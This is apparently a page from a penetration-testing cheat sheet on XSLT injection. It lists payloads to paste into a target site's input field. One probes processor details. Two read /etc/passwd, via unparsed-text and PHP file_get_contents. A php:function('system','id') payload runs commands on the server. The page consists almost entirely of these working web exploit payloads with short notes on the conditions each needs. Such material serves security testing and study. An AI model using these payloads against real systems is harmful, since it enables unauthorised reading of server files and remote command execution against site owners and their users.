XSLT INJECTION (EXPLOITATION)

INFORMATION DISCLOSURE

root@oco:~$ BROWSER > {targetSite:port}
 input field: 
   Version: <xsl:value-of select="system-property('xsl:version')" />
   <br/>
   Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
   <br/>
   Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
   <br/>
   Product Name: <xsl:value-of select="system-property('xsl:product-name')" />
   <br/>
   Product Version: <xsl:value-of select="system-property('xsl:product-version')" />
   
 * if the web application interprets the XSLT elements provided, this confirms an XSLT injection vulnerability.

LOCAL FILE INCLUSION

root@oco:~$ BROWSER > {targetSite:port}
 input field: <xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
 
 * whether this payload works depends on the XSLT version and the configuration of the XSLT library
    - if the web application does not support the 'unparsed-text' function it will error out
       - the unparsed-text function is used to read a local file and was introduced in XSLT version 2.0
       
root@oco:~$ BROWSER > {targetSite:port}
 input field: <xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
 
 * if the XSLT library is configured to support PHP functions, then it can trigger an XSLT Injection
    - the PHP function file_get_contents is used to read a local file

RCE

root@oco:~$ BROWSER > {targetSite:port}
 input field: <xsl:value-of select="php:function('system','id')" />
 
 * If an XSLT processor supports PHP functions, the 'system' function can be used to execute a cmd

PreviousIDENTIFICATION NextFILE UPLOADS

Last updated 4 months ago